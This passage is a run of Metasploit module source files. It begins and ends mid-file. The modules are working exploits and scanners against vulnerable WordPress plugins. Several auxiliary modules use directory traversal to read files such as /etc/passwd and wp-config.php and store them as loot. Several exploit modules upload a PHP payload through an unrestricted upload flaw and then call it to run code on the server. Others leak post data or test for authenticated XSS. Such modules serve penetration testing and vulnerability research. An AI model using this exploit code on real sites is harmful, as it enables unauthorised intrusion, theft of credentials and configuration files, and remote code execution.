vprint_line("#{res.body}") 64 | 65 | fname = datastore['FILEPATH'] 66 | 67 | path = store_loot( 68 | 'wp-ecommerce-shop-styling', 69 | 'text/plain', 70 | ip, 71 | res.body, 72 | fname 73 | ) 74 | 75 | print_good("#{peer} - File saved in: #{path}") 76 | else 77 | print_error("#{peer} - Nothing was downloaded. You can try to change the DEPTH parameter.") 78 | end 79 | end 80 | end 81 | -------------------------------------------------------------------------------- /modules/auxiliary/scanner/http/wp_gimedia_library_file_read.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | 8 | class MetasploitModule < Msf::Auxiliary 9 | 10 | include Msf::Auxiliary::Report 11 | include Msf::Exploit::Remote::HTTP::Wordpress 12 | include Msf::Auxiliary::Scanner 13 | 14 | def initialize(info = {}) 15 | super(update_info(info, 16 | 'Name' => 'WordPress GI-Media Library Plugin File Read Vulnerability', 17 | 'Description' => %q{ 18 | This module exploits a directory traversal vulnerability in WordPress Plugin 19 | "GI-Media Library" version 2.2.2, allowing to read arbitrary files on 20 | WordPress directory. 21 | }, 22 | 'References' => 23 | [ 24 | ['WPVDB', '7754'], 25 | ['URL', 'http://wordpressa.quantika14.com/repository/index.php?id=24'] 26 | ], 27 | 'Author' => 28 | [ 29 | 'Unknown', # Vulnerability discovery - QuantiKa14? 30 | 'Roberto Soares Espreto ' # Metasploit module 31 | ], 32 | 'License' => MSF_LICENSE 33 | )) 34 | 35 | register_options( 36 | [ 37 | OptString.new('FILEPATH', [true, 'The wordpress file to read', 'wp-config.php']), 38 | OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the wordpress root folder)', 3 ]) 39 | ], self.class) 40 | end 41 | 42 | def check 43 | check_plugin_version_from_readme('gi-media-library', '3.0') 44 | end 45 | 46 | def run_host(ip) 47 | traversal = "../" * datastore['DEPTH'] 48 | filename = datastore['FILEPATH'] 49 | filename = filename[1, filename.length] if filename =~ /^\// 50 | 51 | res = send_request_cgi( 52 | 'method' => 'GET', 53 | 'uri' => normalize_uri(wordpress_url_plugins, 'gi-media-library', 'download.php'), 54 | 'vars_get' => 55 | { 56 | 'fileid' => Rex::Text.encode_base64(traversal + filename) 57 | } 58 | ) 59 | 60 | if res && res.code == 200 && res.body && res.body.length > 0 61 | 62 | print_status('Downloading file...') 63 | print_line("\n#{res.body}") 64 | 65 | fname = datastore['FILEPATH'] 66 | 67 | path = store_loot( 68 | 'gimedia-library.file', 69 | 'text/plain', 70 | ip, 71 | res.body, 72 | fname 73 | ) 74 | 75 | print_good("#{peer} - File saved in: #{path}") 76 | else 77 | print_error("#{peer} - Nothing was downloaded. Check the correct path wordpress files.") 78 | end 79 | end 80 | end 81 | -------------------------------------------------------------------------------- /modules/auxiliary/scanner/http/wp_source_control_file_read.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | 8 | class MetasploitModule < Msf::Auxiliary 9 | 10 | include Msf::Auxiliary::Report 11 | include Msf::Exploit::Remote::HTTP::Wordpress 12 | include Msf::Auxiliary::Scanner 13 | 14 | def initialize(info = {}) 15 | super(update_info(info, 16 | 'Name' => 'WordPress Source Control Plugin File Read Vulnerability', 17 | 'Description' => %q{ 18 | This module exploits a directory traversal vulnerability in WordPress Plugin 19 | Source Control version 3.0.0, allowing to read arbitrary files from the 20 | system with the web server privileges. This module has been tested successfully 21 | on Source Control version 3.0.0 with WordPress 4.1.3 on Ubuntu 12.04 Server. 22 | }, 23 | 'References' => 24 | [ 25 | ['WPVDB', '7541'], 26 | ['CVE', '2014-5368'], 27 | ['URL', 'http://www.openwall.com/lists/oss-security/2014/08/19/3'] 28 | ], 29 | 'Author' => 30 | [ 31 | 'Henri Salo', # Vulnerability Discovery 32 | 'Roberto Soares Espreto ' # Metasploit Module 33 | ], 34 | 'License' => MSF_LICENSE 35 | )) 36 | 37 | register_options( 38 | [ 39 | OptString.new('FILEPATH', [true, 'The file to read', '/etc/passwd']), 40 | OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the wordpress root folder)', 7 ]) 41 | ], self.class) 42 | end 43 | 44 | def check 45 | check_plugin_version_from_readme('wp-source-control', '3.1.0') 46 | end 47 | 48 | def run_host(ip) 49 | traversal = '../' * datastore['DEPTH'] 50 | filename = datastore['FILEPATH'] 51 | filename = filename[1, filename.length] if filename =~ /^\// 52 | 53 | res = send_request_cgi( 54 | 'method' => 'GET', 55 | 'uri' => normalize_uri(wordpress_url_plugins, 'wp-source-control', 'downloadfiles', 'download.php'), 56 | 'vars_get' => 57 | { 58 | 'path' => "#{traversal}#{filename}" 59 | } 60 | ) 61 | 62 | if res && res.code == 200 && res.body && res.body.length > 0 63 | fname = datastore['FILEPATH'] 64 | 65 | path = store_loot( 66 | 'wp-source-control.file', 67 | 'text/plain', 68 | ip, 69 | res.body, 70 | fname 71 | ) 72 | 73 | print_good("#{peer} - File saved in: #{path}") 74 | else 75 | print_error("#{peer} - Nothing was downloaded. Check the path and the traversal parameters.") 76 | end 77 | end 78 | end 79 | -------------------------------------------------------------------------------- /modules/auxiliary/scanner/http/wp_really_simple_guest_post_file_read.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | 8 | class MetasploitModule < Msf::Auxiliary 9 | 10 | include Msf::Auxiliary::Report 11 | include Msf::Exploit::Remote::HTTP::Wordpress 12 | include Msf::Auxiliary::Scanner 13 | 14 | def initialize(info = {}) 15 | super(update_info(info, 16 | 'Name' => 'WordPress Really Simple Guest Post File Read Vulnerability', 17 | 'Description' => %q{ 18 | This module exploits a directory traversal vulnerability in WordPress 19 | Plugin "Really Simple Guest Post" version 1.0.6, allowing to read 20 | arbitrary files with the web server privileges. 21 | }, 22 | 'References' => 23 | [ 24 | ['EDB', '37209'], 25 | ['WPVDB', '8036'] 26 | ], 27 | 'Author' => 28 | [ 29 | 'Kuroi\'SH', # Vulnerability Discovery 30 | 'Roberto Soares Espreto ' # Metasploit Module 31 | ], 32 | 'License' => MSF_LICENSE 33 | )) 34 | 35 | register_options( 36 | [ 37 | OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd']) 38 | ], self.class) 39 | end 40 | 41 | def check 42 | check_plugin_version_from_readme('really-simple-guest-post', '1.0.7') 43 | end 44 | 45 | def run_host(ip) 46 | 47 | filename = datastore['FILEPATH'] 48 | filename = filename[1, filename.length] if filename =~ /^\/\// 49 | 50 | data = Rex::MIME::Message.new 51 | data.add_part("#{filename}", 'application/octet-stream', nil, 'form-data; name="rootpath"') 52 | post_data = data.to_s 53 | 54 | 55 | res = send_request_cgi( 56 | 'method' => 'POST', 57 | 'uri' => normalize_uri(wordpress_url_plugins, 'really-simple-guest-post', 'simple-guest-post-submit.php'), 58 | 'ctype' => "multipart/form-data; boundary=#{data.bound}", 59 | 'data' => post_data 60 | ) 61 | 62 | if res && 63 | res.code == 500 && 64 | res.body.length > 0 && 65 | res.headers['Content-Length'].to_i > 0 66 | 67 | vprint_status('Downloading file...') 68 | vprint_line("\n#{res.body}") 69 | fname = datastore['FILEPATH'] 70 | 71 | path = store_loot( 72 | 'reallysimpleguest.traversal', 73 | 'text/plain', 74 | ip, 75 | res.body, 76 | fname 77 | ) 78 | 79 | print_good("#{peer} - File saved in: #{path}") 80 | else 81 | print_error("#{peer} - Nothing was downloaded. You can try to change the FILEPATH parameter.") 82 | end 83 | end 84 | end 85 | -------------------------------------------------------------------------------- /modules/auxiliary/scanner/http/wp_paypal_currency_converter_basic_for_woocommerce_file_read.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | 8 | class MetasploitModule < Msf::Auxiliary 9 | 10 | include Msf::Auxiliary::Report 11 | include Msf::Exploit::Remote::HTTP::Wordpress 12 | include Msf::Auxiliary::Scanner 13 | 14 | def initialize(info = {}) 15 | super(update_info(info, 16 | 'Name' => 'WordPress PayPal WooCommerce File Read Vulnerability', 17 | 'Description' => %q{ 18 | This module exploits a directory traversal vulnerability in WordPress Plugin 19 | "WP PayPal Currency WooCommerce" version 1.3, allowing to read arbitrary files 20 | with the web server privileges. 21 | }, 22 | 'References' => 23 | [ 24 | ['EDB', '37253'], 25 | ['WPVDB', '8042'], 26 | ['CVE', '2015-5065'], 27 | ['URL', 'https://packetstormsecurity.com/files/132278'] 28 | ], 29 | 'Author' => 30 | [ 31 | 'Kuroi SH', # Vulnerability Discovery 32 | 'Roberto Soares Espreto ' # Metasploit Module 33 | ], 34 | 'License' => MSF_LICENSE 35 | )) 36 | 37 | register_options( 38 | [ 39 | OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd']), 40 | OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 7 ]) 41 | ], self.class) 42 | end 43 | 44 | def check 45 | check_plugin_version_from_readme('paypal-currency-converter-basic-for-woocommerce', '1.4') 46 | end 47 | 48 | def run_host(ip) 49 | traversal = "../" * datastore['DEPTH'] 50 | filename = datastore['FILEPATH'] 51 | filename = filename[1, filename.length] if filename =~ /^\// 52 | 53 | res = send_request_cgi( 54 | 'method' => 'GET', 55 | 'uri' => normalize_uri(wordpress_url_plugins, 'paypal-currency-converter-basic-for-woocommerce', 'proxy.php'), 56 | 'vars_get' => 57 | { 58 | 'requrl' => "#{traversal}#{filename}" 59 | } 60 | ) 61 | 62 | if res && res.code == 200 && res.body.length > 0 63 | 64 | vprint_status('Downloading file...') 65 | vprint_line("\n#{res.body}") 66 | 67 | fname = datastore['FILEPATH'] 68 | 69 | path = store_loot( 70 | 'paypal-woocommerce.traversal', 71 | 'text/plain', 72 | ip, 73 | res.body, 74 | fname 75 | ) 76 | 77 | print_good("#{peer} - File saved in: #{path}") 78 | else 79 | print_error("#{peer} - Nothing was downloaded. You can try to change the DEPTH parameter.") 80 | end 81 | end 82 | end 83 | -------------------------------------------------------------------------------- /modules/exploits/unix/webapp/wp_woopra_analytics_file_upload.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | 8 | class MetasploitModule < Msf::Exploit::Remote 9 | Rank = ExcellentRanking 10 | 11 | include Msf::Exploit::Remote::HTTP::Wordpress 12 | include Msf::Exploit::FileDropper 13 | 14 | def initialize(info = {}) 15 | super(update_info( 16 | info, 17 | 'Name' => 'WordPress Woopra Analytics File Upload', 18 | 'Description' => %q{ 19 | The WordPress Woopra Analytics plugin contains an file upload vulnerability. 20 | We can upload arbitrary files to the upload folder, because the plugin also uses 21 | it's own file upload mechanism instead of the wordpress api it's possible to 22 | upload any file type. 23 | }, 24 | 'Author' => 25 | [ 26 | 'wantexz', # Vulnerability Discovery 27 | 'Roberto Soares Espreto ' # Metasploit Module 28 | ], 29 | 'License' => MSF_LICENSE, 30 | 'References' => 31 | [ 32 | ['WPVDB', '6903'], 33 | ['URL', 'http://packetstormsecurity.com/files/123525/'] 34 | ], 35 | 'Privileged' => false, 36 | 'Platform' => ['php'], 37 | 'Arch' => ARCH_PHP, 38 | 'Targets' => [['WP Woopra Analytics 1.4.3.1', {}]], 39 | 'DefaultTarget' => 0, 40 | 'DisclosureDate' => 'Sep 06 2013' 41 | )) 42 | end 43 | 44 | def check 45 | check_plugin_version_from_readme('woopra', '1.4.3.2') 46 | end 47 | 48 | def exploit 49 | print_status("#{peer} - Trying to upload payload") 50 | filename = "#{rand_text_alpha_lower(6)}.php" 51 | 52 | print_status("#{peer} - Uploading payload") 53 | res = send_request_cgi( 54 | 'method' => 'POST', 55 | 'uri' => normalize_uri(wordpress_url_plugins, 'woopra', 'inc', 'php-ofc-library', 'ofc_upload_image.php'), 56 | 'ctype' => 'text/plain', 57 | 'vars_get' => { 58 | 'name' => "#{filename}" 59 | }, 60 | 'data' => payload.encoded 61 | ) 62 | 63 | if res 64 | if res.code == 200 65 | register_files_for_cleanup(filename) 66 | else 67 | fail_with(Failure::Unknown, "#{peer} - Unexpected response, exploit probably failed!") 68 | end 69 | else 70 | fail_with(Failure::Unknown, 'Server did not respond in an expected way') 71 | end 72 | 73 | print_status("#{peer} - Calling uploaded file #{filename}") 74 | send_request_cgi( 75 | { 'uri' => normalize_uri(wordpress_url_plugins, 'woopra', 'inc', 'tmp-upload-images', filename) }, 76 | 5 77 | ) 78 | end 79 | end 80 | -------------------------------------------------------------------------------- /modules/exploits/unix/webapp/wp_creativecontactform_file_upload.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | 8 | class MetasploitModule < Msf::Exploit::Remote 9 | Rank = ExcellentRanking 10 | 11 | include Msf::Exploit::Remote::HTTP::Wordpress 12 | include Msf::Exploit::FileDropper 13 | 14 | def initialize(info = {}) 15 | super(update_info(info, 16 | 'Name' => 'WordPress Creative Contact Form Upload Vulnerability', 17 | 'Description' => %q{ 18 | This module exploits an arbitrary PHP code upload in the WordPress Creative Contact 19 | Form version 0.9.7. The vulnerability allows for arbitrary file upload and remote code execution. 20 | }, 21 | 'Author' => 22 | [ 23 | 'Gianni Angelozzi', # Vulnerability discovery 24 | 'Roberto Soares Espreto ' # Metasploit module 25 | ], 26 | 'License' => MSF_LICENSE, 27 | 'References' => 28 | [ 29 | ['EDB', '35057'], 30 | ['OSVDB', '113669'], 31 | ['WPVDB', '7652'] 32 | ], 33 | 'Privileged' => false, 34 | 'Platform' => 'php', 35 | 'Arch' => ARCH_PHP, 36 | 'Targets' => [['Creative Contact Form 0.9.7', {}]], 37 | 'DisclosureDate' => 'Oct 22 2014', 38 | 'DefaultTarget' => 0) 39 | ) 40 | end 41 | 42 | def check 43 | check_plugin_version_from_readme('sexy-contact-form', '1.0.0') 44 | end 45 | 46 | def exploit 47 | php_pagename = rand_text_alpha(8 + rand(8)) + '.php' 48 | 49 | data = Rex::MIME::Message.new 50 | data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"files[]\"; filename=\"#{php_pagename}\"") 51 | post_data = data.to_s 52 | 53 | res = send_request_cgi({ 54 | 'uri' => normalize_uri(wordpress_url_plugins, 'sexy-contact-form', 'includes', 'fileupload', 'index.php'), 55 | 'method' => 'POST', 56 | 'ctype' => "multipart/form-data; boundary=#{data.bound}", 57 | 'data' => post_data 58 | }) 59 | 60 | if res 61 | if res.code == 200 && res.body =~ /files|#{php_pagename}/ 62 | print_good("#{peer} - Our payload is at: #{php_pagename}. Calling payload...") 63 | register_files_for_cleanup(php_pagename) 64 | else 65 | fail_with("#{peer} - Unable to deploy payload, server returned #{res.code}") 66 | end 67 | else 68 | fail_with('ERROR') 69 | end 70 | 71 | print_status("#{peer} - Calling payload...") 72 | send_request_cgi( 73 | 'uri' => normalize_uri(wordpress_url_plugins, 'sexy-contact-form', 'includes', 'fileupload', 'files', php_pagename) 74 | ) 75 | end 76 | end 77 | -------------------------------------------------------------------------------- /modules/exploits/unix/webapp/wp_inboundio_marketing_file_upload.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | 8 | class MetasploitModule < Msf::Exploit::Remote 9 | Rank = ExcellentRanking 10 | 11 | include Msf::Exploit::Remote::HTTP::Wordpress 12 | include Msf::Exploit::FileDropper 13 | 14 | def initialize(info = {}) 15 | super(update_info(info, 16 | 'Name' => 'WordPress InBoundio Marketing Upload Vulnerability', 17 | 'Description' => %q{ 18 | This module exploits an arbitrary PHP code upload in the WordPress InBoundio Marketing 19 | version 2.0. The vulnerability allows for arbitrary file upload and remote code execution. 20 | }, 21 | 'Author' => 22 | [ 23 | 'KedAns-Dz', # Vulnerability discovery 24 | 'Roberto Soares Espreto ' # Metasploit module 25 | ], 26 | 'License' => MSF_LICENSE, 27 | 'References' => 28 | [ 29 | ['EDB', '36478'], 30 | ['OSVDB', '119890'], 31 | ['WPVDB', '7864'] 32 | ], 33 | 'Privileged' => false, 34 | 'Platform' => 'php', 35 | 'Arch' => ARCH_PHP, 36 | 'Targets' => [['InBoundio Marketing 2.0', {}]], 37 | 'DisclosureDate' => 'Mar 24 2015', 38 | 'DefaultTarget' => 0) 39 | ) 40 | end 41 | 42 | def check 43 | check_plugin_version_from_readme('inboundio-marketing', '2.0.3') 44 | end 45 | 46 | def exploit 47 | php_pagename = rand_text_alpha(8 + rand(8)) + '.php' 48 | 49 | data = Rex::MIME::Message.new 50 | data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"file\"; filename=\"#{php_pagename}\"") 51 | post_data = data.to_s 52 | 53 | res = send_request_cgi( 54 | 'uri' => normalize_uri(wordpress_url_plugins, 'inboundio-marketing', 'admin', 'partials', 'csv_uploader.php'), 55 | 'method' => 'POST', 56 | 'ctype' => "multipart/form-data; boundary=#{data.bound}", 57 | 'data' => post_data 58 | ) 59 | 60 | if res 61 | if res.code == 200 && res.body =~ /#{php_pagename}/ 62 | print_good("#{peer} - Our payload is at: #{php_pagename}.") 63 | register_files_for_cleanup(php_pagename) 64 | else 65 | fail_with(Failure::Unknown, "#{peer} - Unable to deploy payload, server returned #{res.code}") 66 | end 67 | else 68 | fail_with(Failure::Unknown, 'Server did not respond in an expected way') 69 | end 70 | 71 | print_status("#{peer} - Calling payload...") 72 | send_request_cgi( 73 | 'uri' => normalize_uri(wordpress_url_plugins, 'inboundio-marketing', 'admin', 'partials', 'uploaded_csv', php_pagename) 74 | ) 75 | end 76 | end 77 | -------------------------------------------------------------------------------- /modules/auxiliary/scanner/http/wp_se_html5_album_audioplayer_file_read.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | 8 | class MetasploitModule < Msf::Auxiliary 9 | 10 | include Msf::Auxiliary::Report 11 | include Msf::Exploit::Remote::HTTP::Wordpress 12 | include Msf::Auxiliary::Scanner 13 | 14 | def initialize(info = {}) 15 | super(update_info(info, 16 | 'Name' => 'WordPress SE HTML5 Album Audio Player File Read Vulnerability', 17 | 'Description' => %q{ 18 | This module exploits a directory traversal vulnerability in WordPress Plugin 19 | "SE HTML5 Album Audio PLayer", allowing to read arbitrary files with the web server 20 | privileges. 21 | }, 22 | 'References' => 23 | [ 24 | ['WPVDB', '8032'], 25 | ['CVE', '2015-4414'], 26 | ['URL', 'http://www.vapid.dhs.org/advisory.php?v=124'] 27 | ], 28 | 'Author' => 29 | [ 30 | 'Larry Cashdollar', # Vulnerability Discovery 31 | 'Roberto Soares Espreto ' # Metasploit Module 32 | ], 33 | 'License' => MSF_LICENSE 34 | )) 35 | 36 | register_options( 37 | [ 38 | OptString.new('FILEPATH', [true, "The path to the file to read", "/etc/passwd"]), 39 | OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 6 ]) 40 | ], self.class) 41 | end 42 | 43 | def check 44 | check_plugin_version_from_readme('se-html5-album-audio-player') 45 | end 46 | 47 | def run_host(ip) 48 | traversal = "../" * datastore['DEPTH'] 49 | filename = datastore['FILEPATH'] 50 | filename = filename[1, filename.length] if filename =~ /^\// 51 | 52 | res = send_request_cgi( 53 | 'method' => 'GET', 54 | 'uri' => normalize_uri(wordpress_url_plugins, 'se-html5-album-audio-player', 'download_audio.php'), 55 | 'vars_get' => 56 | { 57 | 'file' => "/wp-content/uploads/#{traversal}#{filename}" 58 | } 59 | ) 60 | 61 | #puts("REQUEST:\n#{res.request}") 62 | unless res && res.body 63 | vprint_error("#{peer} - Failed! Unaxpected response from server.") 64 | return 65 | end 66 | 67 | if res.code == 200 && res.body.length > 0 68 | 69 | vprint_status('Downloading file...') 70 | vprint_line("#{res.body}") 71 | 72 | fname = datastore['FILEPATH'] 73 | 74 | path = store_loot( 75 | 'se-html5-album', 76 | 'text/plain', 77 | ip, 78 | res.body, 79 | fname 80 | ) 81 | 82 | print_good("#{peer} - File saved in: #{path}") 83 | else 84 | print_error("#{peer} - Nothing was downloaded. You can try to change the DEPTH parameter.") 85 | end 86 | end 87 | end 88 | -------------------------------------------------------------------------------- /modules/exploits/unix/webapp/wp_wpshop_ecommerce_file_upload.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | 8 | class MetasploitModule < Msf::Exploit::Remote 9 | Rank = ExcellentRanking 10 | 11 | include Msf::Exploit::Remote::HTTP::Wordpress 12 | include Msf::Exploit::FileDropper 13 | 14 | def initialize(info = {}) 15 | super(update_info(info, 16 | 'Name' => 'WordPress WPshop eCommerce Upload Vulnerability', 17 | 'Description' => %q{ 18 | This module exploits an arbitrary PHP code upload in the WordPress WPshop eCommerce plugin, 19 | version 1.3.9.5. The vulnerability allows for arbitrary file upload and remote code execution. 20 | }, 21 | 'Author' => 22 | [ 23 | 'g0blin', # Vulnerability Discovery 24 | 'Roberto Soares Espreto ' # Metasploit Module 25 | ], 26 | 'License' => MSF_LICENSE, 27 | 'References' => 28 | [ 29 | ['WPVDB', '7830'], 30 | ['URL', 'https://research.g0blin.co.uk/g0blin-00036/'] 31 | ], 32 | 'Privileged' => false, 33 | 'Platform' => 'php', 34 | 'Arch' => ARCH_PHP, 35 | 'Targets' => [['WPshop eCommerce 1.3.9.5', {}]], 36 | 'DisclosureDate' => 'Mar 09 2015', 37 | 'DefaultTarget' => 0) 38 | ) 39 | end 40 | 41 | def check 42 | check_plugin_version_from_readme('wpshop', '1.3.9.6') 43 | end 44 | 45 | def exploit 46 | php_pagename = rand_text_alpha(5 + rand(5)) + '.php' 47 | 48 | data = Rex::MIME::Message.new 49 | data.add_part('ajaxUpload', nil, nil, 'form-data; name="elementCode"') 50 | data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"wpshop_file\"; filename=\"#{php_pagename}\"") 51 | post_data = data.to_s 52 | 53 | res = send_request_cgi( 54 | 'uri' => normalize_uri(wordpress_url_plugins, 'wpshop', 'includes', 'ajax.php'), 55 | 'method' => 'POST', 56 | 'ctype' => "multipart/form-data; boundary=#{data.bound}", 57 | 'data' => post_data 58 | ) 59 | 60 | if res 61 | if res.code == 200 && res.body =~ /#{php_pagename}/ 62 | print_good("#{peer} - Our payload is at: #{php_pagename}.") 63 | register_files_for_cleanup(php_pagename) 64 | else 65 | fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}") 66 | end 67 | else 68 | fail_with(Failure::Unknown, 'Server did not respond in an expected way') 69 | end 70 | 71 | print_status("#{peer} - Calling payload...") 72 | send_request_cgi( 73 | 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', php_pagename) 74 | ) 75 | end 76 | end 77 | -------------------------------------------------------------------------------- /modules/auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | 8 | class MetasploitModule < Msf::Auxiliary 9 | 10 | include Msf::Auxiliary::Report 11 | include Msf::Exploit::Remote::HTTP::Wordpress 12 | include Msf::Auxiliary::Scanner 13 | 14 | def initialize(info = {}) 15 | super(update_info(info, 16 | 'Name' => 'WordPress Mobile Pack Information Disclosure Vulnerability', 17 | 'Description' => %q{ 18 | This module exploits a information disclosure vulnerability in WordPress Plugin 19 | "WP Mobile Pack" version 2.1.2, allowing to read files with privileges 20 | informations. 21 | }, 22 | 'References' => 23 | [ 24 | ['WPVDB', '8107'], 25 | ['URL', 'https://packetstormsecurity.com/files/132750/'] 26 | ], 27 | 'Author' => 28 | [ 29 | 'Nitin Venkatesh', # Vulnerability Discovery 30 | 'Roberto Soares Espreto ' # Metasploit Module 31 | ], 32 | 'License' => MSF_LICENSE 33 | )) 34 | 35 | register_options( 36 | [ 37 | OptString.new('POSTID', [true, 'The post identification to read', '1']) 38 | ], self.class) 39 | end 40 | 41 | def check 42 | check_plugin_version_from_readme('wordpress-mobile-pack', '2.1.3') 43 | end 44 | 45 | def run_host(ip) 46 | postid = datastore['POSTID'] 47 | 48 | begin 49 | res = send_request_cgi( 50 | 'method' => 'GET', 51 | 'uri' => normalize_uri(wordpress_url_plugins, 'wordpress-mobile-pack', 'export', 'content.php'), 52 | 'vars_get' => { 53 | 'content' => 'exportarticle', 54 | 'callback' => 'exportarticle', 55 | 'articleId' => "#{postid}" 56 | } 57 | ) 58 | temp = JSON.parse(res.body.gsub(/exportarticle\(/, "").gsub(/\)/, "")) 59 | rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, JSON::ParserError => e 60 | print_error("#{peer} - The following Error was encountered: #{e.class}") 61 | return 62 | end 63 | 64 | if res && 65 | res.code == 200 && 66 | res.body.length > 29 && 67 | res.headers['Content-Type'].include?('application/json') && 68 | !res.body.include?('"error":') 69 | 70 | vprint_status('Enumerating...') 71 | res_clean = JSON.pretty_generate(temp) 72 | vprint_good("Found:\n\n#{res_clean}\n") 73 | 74 | path = store_loot( 75 | 'mobilepack.disclosure', 76 | 'text/plain', 77 | ip, 78 | res_clean 79 | ) 80 | print_good("#{peer} - File saved in: #{path}") 81 | else 82 | print_error("#{peer} - Nothing was downloaded. You can try checking the POSTID parameter.") 83 | end 84 | end 85 | end 86 | -------------------------------------------------------------------------------- /modules/auxiliary/scanner/http/wp_ninja_forms_xss_scanner.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | 8 | class MetasploitModule < Msf::Auxiliary 9 | 10 | include Msf::Exploit::Remote::HTTP::Wordpress 11 | include Msf::Auxiliary::Scanner 12 | include Msf::Auxiliary::Report 13 | 14 | def initialize(info = {}) 15 | super(update_info(info, 16 | 'Name' => 'WordPress Ninja Forms XSS Scanner', 17 | 'Description' => %q{ 18 | This module attempts to exploit an Authenticated Cross-Site Scripting in Ninja 19 | Forms Plugin for WordPress, version 2.9.21 and likely prior in order if the 20 | instance is vulnerable. 21 | }, 22 | 'Author' => 23 | [ 24 | 'Morten Nørtoft, Kenneth Jepsen, Mikkel Vej', # Vulnerability Discovery 25 | 'Roberto Soares Espreto ' # Metasploit Module 26 | ], 27 | 'License' => MSF_LICENSE, 28 | 'References' => 29 | [ 30 | ['WPVDB', '8128'], 31 | ['URL', 'https://packetstormsecurity.com/files/132913/'] 32 | ], 33 | 'DisclosureDate' => 'Jul 14 2015' 34 | )) 35 | 36 | register_options( 37 | [ 38 | OptString.new('WP_USER', [true, 'A valid username', nil]), 39 | OptString.new('WP_PASS', [true, 'A valid password', nil]) 40 | ], self.class) 41 | end 42 | 43 | def check 44 | check_plugin_version_from_readme('ninja-forms', '2.9.22') 45 | end 46 | 47 | def user 48 | datastore['WP_USER'] 49 | end 50 | 51 | def password 52 | datastore['WP_PASS'] 53 | end 54 | 55 | def run_host(ip) 56 | vprint_status("#{peer} - Trying to login as: #{user}") 57 | cookie = wordpress_login(user, password) 58 | if cookie.nil? 59 | print_error("#{peer} - Unable to login as: #{user}") 60 | return 61 | end 62 | 63 | xss = "" 64 | 65 | res = send_request_cgi( 66 | 'uri' => normalize_uri(wordpress_url_backend, 'admin.php'), 67 | 'vars_get' => { 68 | 'page' => 'nf-processing', 69 | 'title' => "#{xss}" 70 | }, 71 | 'cookie' => cookie 72 | ) 73 | 74 | unless res && res.body 75 | print_error("#{peer} - Server did not respond in an expected way") 76 | return 77 | end 78 | 79 | if res.code == 200 && res.body.include?("#{xss}") 80 | print_good("#{peer} - Vulnerable to Cross-Site Scripting the Ninja Forms 2.9.21 plugin for WordPress") 81 | p = store_local( 82 | 'ninjaforms.http', 83 | 'text/html', 84 | res.body, 85 | "#{xss}" 86 | ) 87 | print_good("Save in: #{p}") 88 | else 89 | print_error("#{peer} - Failed, maybe the target isn't vulnerable.") 90 | end 91 | end 92 | end 93 | -------------------------------------------------------------------------------- /modules/auxiliary/scanner/http/wp_database_sync_xss_scanner.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | 8 | class MetasploitModule < Msf::Auxiliary 9 | 10 | include Msf::Exploit::Remote::HTTP::Wordpress 11 | include Msf::Auxiliary::Scanner 12 | include Msf::Auxiliary::Report 13 | 14 | def initialize(info = {}) 15 | super(update_info(info, 16 | 'Name' => 'WordPress Database Sync XSS Scanner', 17 | 'Description' => %q{ 18 | This module attempts to exploit an Authenticated Cross-Site Scripting in 19 | Database Sync Plugin for WordPress, version 0.4 and likely prior in order 20 | if the instance is vulnerable. 21 | }, 22 | 'Author' => 23 | [ 24 | 'Morten Nørtoft, Kenneth Jepsen & Mikkel Vej', # Vulnerability Discovery 25 | 'Roberto Soares Espreto ' # Metasploit Module 26 | ], 27 | 'License' => MSF_LICENSE, 28 | 'References' => 29 | [ 30 | ['WPVDB', '8127'], 31 | ['URL', 